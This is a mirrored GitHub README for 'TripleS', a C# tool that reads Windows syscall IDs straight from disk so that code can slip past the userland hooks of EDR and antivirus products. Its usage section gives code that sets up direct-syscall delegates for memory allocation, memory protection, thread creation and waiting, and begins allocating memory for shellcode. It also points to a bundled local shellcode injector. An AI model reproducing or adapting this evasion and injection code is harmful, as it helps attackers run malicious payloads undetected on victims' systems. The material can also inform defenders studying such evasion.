TripleS Save
Extracting Syscall Stub, Modernized
Project README
TripleS - Extracting Syscall Stub, Modernized
TripleS or 3S is short for Syscall Stub Stealer. It freshly "steal" syscall stub straight from the disk. You can use TripleS for evading userland hooks from EDRs/AVs. TripleS doesnt invoke any unmanaged API, its all .NET's managed function. I should rename this program tho, since it doesnt use stubs anymore (v4), instead, it only collects syscall IDs.
Usage
- Create a new instance of TripleS
TripleS syscallstealer = new TripleS();
- Prepare gate space
bool result = syscallstealer.PrepareGateSpace();
if (!result) {
Console.WriteLine("Failed to prepare gate space!");
return;
}
- Collect all the syscalls
syscallstealer.CollectAllSyscalls(); // the syscall informations will be stored on the TripleS object
if (!syscallstealer.IsSyscallReady) {
Console.WriteLine("Failed to collect syscall!");
return;
}
- Initialize the delegates
NTAVMDelegate NTAVM = (NTAVMDelegate)Marshal.GetDelegateForFunctionPointer(syscallstealer.GatePositionAddress, typeof(NTAVMDelegate));
NTCTEDelegate NTCTE = (NTCTEDelegate)Marshal.GetDelegateForFunctionPointer(syscallstealer.GatePositionAddress, typeof(NTCTEDelegate));
NTPVMDelegate NTPVM = (NTPVMDelegate)Marshal.GetDelegateForFunctionPointer(syscallstealer.GatePositionAddress, typeof(NTPVMDelegate));
NTWFSODelegate NTWFSO = (NTWFSODelegate)Marshal.GetDelegateForFunctionPointer(syscallstealer.GatePositionAddress, typeof(NTWFSODelegate));
- Use it!
IntPtr ProcessHandle = new IntPtr(-1); // pseudo-handle for current process
IntPtr ShellcodeBytesLength = new IntPtr(ShellcodeBytes.Length);
IntPtr AllocationAddress = new IntPtr();
IntPtr ZeroBitsThatZero = IntPtr.Zero;
UInt32 AllocationTypeUsed = (UInt32)AllocationType.Commit | (UInt32)AllocationType.Reserve;
Console.WriteLine("[*] Allocating memory...");
syscallstealer.Gate(NTAVMHash); // dont forget to set the gate to your destination function ;)
NTAVM(ProcessHandle, ref AllocationAddress, ZeroBitsThatZero, ref ShellcodeBytesLength, AllocationTypeUsed, 0x04);
If you still confused, you can take a look at Main function from UsageExample class, its a local shellcode injector function with TripleS implemented. This code uses C# 5, so it can be compiled with the built-in CSC from Windows 10.
Note
- If you want to copy the code,Please dont forget to credit me.
- Github doesn't like my Sublime Text indentation settings, so if you see some "weirdness" on the indentation, Im sorry.
Open Source Agenda is not affiliated with "TripleS" Project. README Source: GetRektBoy724/TripleS
Stars
60
Open Issues
0
Last Commit
2 years ago
Repository
Open Source Agenda Badge
